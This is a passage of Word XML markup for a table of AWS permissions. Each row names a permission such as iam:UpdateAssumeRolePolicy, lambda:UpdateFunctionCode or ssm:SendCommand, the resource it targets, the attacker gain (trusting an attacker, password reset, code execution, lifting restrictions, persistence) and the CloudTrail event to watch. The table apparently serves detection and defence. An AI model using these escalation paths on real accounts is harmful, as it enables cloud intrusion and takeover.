      <w:tr w:rsidR="00000000" w14:paraId="00B730D3" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0280C0E3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:SetDefaultPolicyVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="207488A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Stale permissive version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31AB2D6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Activate stored permission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EF8FAB8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SetDefaultPolicyVersion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="704DA594" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ED8C92D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:UpdateAssumeRolePolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DAA718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role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ED1430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Add attacker as trusted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D047D74" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UpdateAssumeRolePolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="701126EC" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DD601D2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iam:UpdateLoginProfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4610B43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Any user</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09DECDF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Reset their password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="438F6B38" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UpdateLoginProfile</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="3782775B" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D0F14EF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>kms:CreateGrant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26A2EF9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key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53CD3FE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Decrypt/encrypt grant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0418690B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CreateGrant</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="675712E9" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2329A5EB" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>lambda:UpdateFunctionCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FCEE34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function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EF178B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RCE under exec role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60B0526D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UpdateFunctionCode20150331v2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="09FFFDE3" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="127D6364" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>lambda:AddPermission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F5AB8A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function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="066A1FB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Invocation rights</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30500C98" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AddPermission20150331v2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="08C72004" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CBB98B3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>organizations:DetachPolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03DDDD7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SCP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7185571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Lift account-wide restriction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="236C3201" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>DetachPolicy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="2DC0ABDF" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A23F026" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>s3:PutBucketNotification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2FC0D29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Lambda + bucket</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="135B130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Persistent trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27F644F8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PutBucketNotification</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="6AFBAD54" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="538E5251" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>secretsmanager:UpdateSecret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15F8D22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secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05A21AA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Overwrite consumed secret</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36E42F69" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>UpdateSecret</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="76E39EDF" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="543555B8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sso-admin:CreatePermissionSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D26446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Identity Center instance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="601A944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Organization-wide admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76B773D5" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CreatePermissionSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="7DD148C0" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1552D1D1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ssm:SendCommand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2547FBB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Managed instance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="558F9B0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RCE as root/SYSTEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="013C3531" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SendCommand</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="1FD3FD90" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60E0F78B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ssm:PutParameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3185766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Consumed parameter path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="681B036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Replace config value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F5EB85F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PutParameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="491E7312" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22B34A44" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>sts:AssumeRole</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (role chaining)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5334DB1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Trusted target role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DC5A04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Target role's permissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11A3847D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>AssumeRole</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="4EAEA906" w14:textId="77777777">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30315434" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:rPr>
